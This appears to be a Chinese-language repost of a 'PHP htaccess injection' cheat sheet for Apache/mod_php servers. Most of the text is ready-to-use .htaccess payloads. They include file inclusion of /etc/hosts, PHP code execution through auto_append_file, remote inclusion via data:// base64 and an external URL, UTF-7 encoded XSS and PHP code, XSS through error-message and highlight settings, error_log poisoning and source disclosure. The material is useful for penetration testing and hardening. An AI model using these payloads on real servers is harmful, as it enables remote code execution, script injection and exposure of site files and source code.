2. it
  3. PHP htaccess注入备忘单

PHP htaccess注入备忘单

mac2024-10-20  52

情境

在Apache / mod_php的安装程序中,攻击者能够注入.htaccess(或php.ini或apache配置)。注入目录中设置了AllowOverride Options(或AllowOverride All,这也是很常见的)。

例子

示例1a:文件包含

index.php :(空)

.htaccess:

php_value auto_append_file /etc/hosts

例1b:PHP代码执行

index.php :(空)

.htaccess:

php_value auto_append_file .htaccess #<?php phpinfo();

示例1c :(直接/远程)包含文件

index.php :(空)

.htaccess:

php_flag allow_url_include 1 php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw== #php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B #php_value auto_append_file https://sektioneins.de/evil-code.txt

示例1d:使用UTF-7执行XSS和PHP代码

index.php :(空)

.htaccess:

php_flag zend.multibyte 1 php_value zend.script_encoding "UTF-7" php_value auto_append_file .htaccess #+ADw-script+AD4-alert(1)+ADsAPA-/script+AD4 #+ADw?php phpinfo()+ADs

示例2a:通过错误消息链接进行XSS

index.php :(产生错误消息)

<?php include('foo');

.htaccess:

php_flag display_errors 1 php_flag html_errors 1 php_value docref_root "'><script>alert(1);</script>"

示例2b:通过错误消息链接扩展的XSS

index.php:

<?php include('foo');

.htaccess:

php_flag display_errors 1 php_flag html_errors 1 php_value docref_root "x" php_value docref_ext "<script>alert(1);</script>"

示例3a:通过phps颜色进行XSS

假设:phps源处理程序已激活。

<FilesMatch ".+\.phps$"> SetHandler application/x-httpd-php-source Order Allow,Deny Allow from all </FilesMatch>

index.phps:

<?php test(); // comment ?> text

.htaccess:

php_value highlight.comment '"><script>alert(1);</script>'

示例3b:通过highlight_file()颜色进行XSS

index.php:

<?php highlight_file(__FILE__); // comment

.htaccess:

php_value highlight.comment '"><script>alert(1);</script>'

示例4a:通过error_log和include_path注入的PHP失败

在此示例中,PHP在日志消息中正确编码了HTML实体。注入失败。

index.php:

<?php include('foo');

.htaccess:

php_value error_log /var/www/ex4a/foo.php php_value include_path "<?php phpinfo(); __halt_compiler();"

示例4b:通过error_log和auto_prepend_file注入的PHP失败

index.php :(空)

.htaccess:

php_value error_log /var/www/ipc/ex4b/foo.php php_value auto_prepend_file "<?php phpinfo(); __halt_compiler();"

示例4c:通过error_log和UTF-7注入PHP代码

index.php :(空)

.htaccess:

php_value error_log /var/www/ipc/ex4c/foo.php #---- "<?php phpinfo(); __halt_compiler();" in UTF-7: php_value include_path "+ADw?php phpinfo()+ADs +AF8AXw-halt+AF8-compiler()+ADs" php_flag zend.multibyte 1 php_value zend.script_encoding "UTF-7"

示例6:源代码公开

index.php:

<?php some_code();

.htaccess:

php_flag engine 0
最新回复(0)